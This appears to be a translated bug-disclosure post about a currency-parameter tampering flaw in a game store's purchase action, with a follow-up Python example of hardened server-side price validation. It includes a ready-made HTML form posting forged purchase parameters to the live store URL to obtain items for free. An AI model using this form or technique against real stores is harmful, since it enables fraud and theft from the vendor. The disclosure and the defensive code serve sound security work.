http://store.lol.qq.com/store/purchase/item
In this action, the currency_type parameter is not strictly validated on the server.
For example, an item that is normally priced in game gold coins is submitted with
currency_type = ip
The action decides which price to charge purely from the value supplied in currency_type.
If the value is changed to currency_type = rp, the purchase succeeds without paying any money, because the RP (RMB) price of a gold-coin item is 0.
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>untitled document</title>
</head>
<body>
<!-- Test form that posts the purchase parameters directly to the store action -->
<form action="http://store.lol.qq.com/store/purchase/item" method="post">
<input name="item_id" type="text" value="boosts_9"/>
<br/>
<!-- currency_type: the value the server trusts without checking it against the item -->
<input name="currency_type" type="text" value="ip"/>
<br/>
<input name="quantity" type="text" value="9"/>
<br/>
<input name="rp" type="text" value=""/>
<br/>
<input name="ip" type="text" value=""/>
<br/>
<input name="duration_type" type="text" value="PURCHASED"/>
<br/>
<input name="duration" type="text" value="10"/>
<br/>
<input name="submit" type="submit" value="submit"/>
</form>
</body>
</html>
item_id is the ID of the item being purchased.
Proof of vulnerability:
I have already reported this to Quantum Studio and it has been fixed. I am posting it here to earn rank, and to share the cause of the problem with you.
When will the RMB be promised? cry ~~~
Solution:
Americans know
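As an added illustration of the server-side check that closes this class of bug (example code written for this page, not the store's real implementation): the item catalog, wallet, and function names below are constructed. The point is that the price, and the set of currencies an item can be bought with, must come from the server's catalog, and a currency the item is not offered in must be rejected rather than priced at 0. The client-supplied rp and ip fields seen in the form above are ignored entirely.

```python
"""
Server-side purchase validation for a store action that receives
item_id / currency_type / quantity from the client.

Added example, not the store's own code: CATALOG, Wallet and the
function names are constructed for illustration.
"""
from dataclasses import dataclass, field

# Constructed catalog. An item lists a price only for the currencies it
# is actually sold in; "boosts_9" is sold for IP (gold coins) only.
CATALOG = {
    "boosts_9": {"ip": 1200},
    "skin_42": {"rp": 975},
    "champ_7": {"ip": 6300, "rp": 975},
}

ALLOWED_CURRENCIES = {"ip", "rp"}


class PurchaseError(Exception):
    """Raised when a purchase request is rejected."""


@dataclass
class Wallet:
    ip: int = 0
    rp: int = 0
    items: list = field(default_factory=list)


def vulnerable_price(item_id: str, currency_type: str) -> int:
    """Mirrors the flaw in the report: a currency the item is not sold in
    silently costs 0, so switching currency_type makes the item free."""
    return CATALOG[item_id].get(currency_type, 0)


def purchase(wallet: Wallet, form: dict) -> int:
    """Hardened handler. Every price-affecting fact comes from the
    server-side catalog; client fields such as 'rp' and 'ip' are never
    read. Returns the amount charged."""
    item_id = form.get("item_id")
    currency = form.get("currency_type")
    if item_id not in CATALOG:
        raise PurchaseError("unknown item")
    # Allow-list the currency, then require the item to be offered in it.
    if currency not in ALLOWED_CURRENCIES:
        raise PurchaseError("unknown currency")
    if currency not in CATALOG[item_id]:
        raise PurchaseError("item not sold in that currency")
    try:
        quantity = int(form.get("quantity", ""))
    except ValueError:
        raise PurchaseError("quantity must be an integer") from None
    if not 1 <= quantity <= 100:
        raise PurchaseError("quantity out of range")
    total = CATALOG[item_id][currency] * quantity
    if total <= 0:
        # Defense in depth: a zero or negative charge is never legitimate.
        raise PurchaseError("non-positive price")
    balance = getattr(wallet, currency)
    if balance < total:
        raise PurchaseError("insufficient funds")
    setattr(wallet, currency, balance - total)
    wallet.items.extend([item_id] * quantity)
    return total


if __name__ == "__main__":
    w = Wallet(ip=0, rp=5000)
    print("vulnerable lookup charges:", vulnerable_price("boosts_9", "rp"))
    try:
        purchase(w, {"item_id": "boosts_9", "currency_type": "rp", "quantity": "9"})
    except PurchaseError as e:
        print("hardened handler rejected:", e)
```

With the vulnerable lookup, boosts_9 priced in rp costs 0; with the hardened handler the same request is rejected because the item is not sold in that currency, and a legitimate ip purchase is charged at the catalog price times quantity.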
Author: Shuhe elder brother @ wooyun